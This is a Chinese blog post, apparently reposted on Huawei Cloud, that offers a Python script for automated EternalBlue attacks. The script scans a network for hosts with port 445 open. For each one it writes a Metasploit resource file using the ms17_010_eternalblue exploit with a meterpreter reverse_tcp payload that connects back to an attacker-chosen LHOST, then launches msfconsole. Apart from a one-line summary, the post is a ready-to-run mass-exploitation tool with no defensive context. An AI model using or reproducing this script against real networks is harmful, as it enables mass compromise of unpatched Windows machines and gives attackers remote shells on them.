Python脚本与Metasploit交互进行自动永恒之蓝攻击

举报
谢公子 发表于 2021/11/19 01:17:35 2021/11/19
1.8k+ 0 0
【摘要】 我们首先利用 findTarget() 函数找到目标网段或目标主机中开放了445端口的主机,然后利用 confickerExploit() 函数将攻击代码写入 configure.rc 配置文件中,最后调用 MSF 框架读取配置文件进行攻击! # -*- coding: ut...

我们首先利用 findTarget() 函数找到目标网段或目标主机中开放了445端口的主机,然后利用 confickerExploit() 函数将攻击代码写入 configure.rc 配置文件中,最后调用 MSF 框架读取配置文件进行攻击!


      # -*- coding: utf-8 -*-
      """
      Created on Sun Nov 12 09:11:33 2018
      @author: 小谢
      """
      import os
      import optparse
      import sys
      import nmap
      def findTarget(Hosts):              #扫描网段范围内开放445端口的主机
          nmScan=nmap.PortScanner()
          nmScan.scan(Hosts,'445')
          targets=[]
         for t in nmScan.all_hosts():
             if nmScan[t].has_tcp(445):  #如果445端口提供了协议
                  state=nmScan[t]['tcp'][445]['state']  #查看445端口的状态
                 if state=='open':
                     print '[+]Found Target Host:'+t
                      targets.append(t)
         return targets         #返回开放445端口的主机列表
      def confickerExploit(configFile,target,lhost):       #漏洞利用
          configFile.write('use exploit/windows/smb/ms17_010_eternalblue \n')  #漏洞利用代码
          configFile.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp\n')
          configFile.write('set RHOST '+str(target)+'\n')              #设定参数
          configFile.write('set LHOST '+lhost+'\n')
          configFile.write('exploit -j -z\n')    #j选项是将所有连接的会话保持在后台 -z不与任务进行即时交换
      def main():
          configFile=open('configure.rc','w')  #以写入方式打开配置文件
          usage='[-]Usage %prog -H <RHOSTS> -l/-L <LHOST> '
          parser=optparse.OptionParser(usage)
          parser.add_option('-H',dest='target',type='string',help='target host')           #目标主机
          parser.add_option('-l','-L',dest='lhost',type='string',help='listen address')    #我们的主机
          (options,args)=parser.parse_args()
          target=options.target
          lhost=options.lhost
         if (target==None)|(lhost==None):
             print parser.usage
              exit(0)
          targets=findTarget(options.target)           #寻找目标
         for target in targets:                       #逐个攻击
              confickerExploit(configFile,target,lhost)
              configFile.close()
              os.system('msfconsole -r configure.rc')  #启动metasploit并读取配置文件
      if __name__=='__main__':
          main()
  
 

文章来源: xie1997.blog.csdn.net,作者:谢公子,版权归原作者所有,如需转载,请联系作者。

原文链接:xie1997.blog.csdn.net/article/details/83986928

【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

作者其他文章

评论(0

抱歉,系统识别当前为高风险访问,暂不支持该操作

    全部回复

    上滑加载中

    设置昵称

    在此一键设置昵称,即可参与社区互动!

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。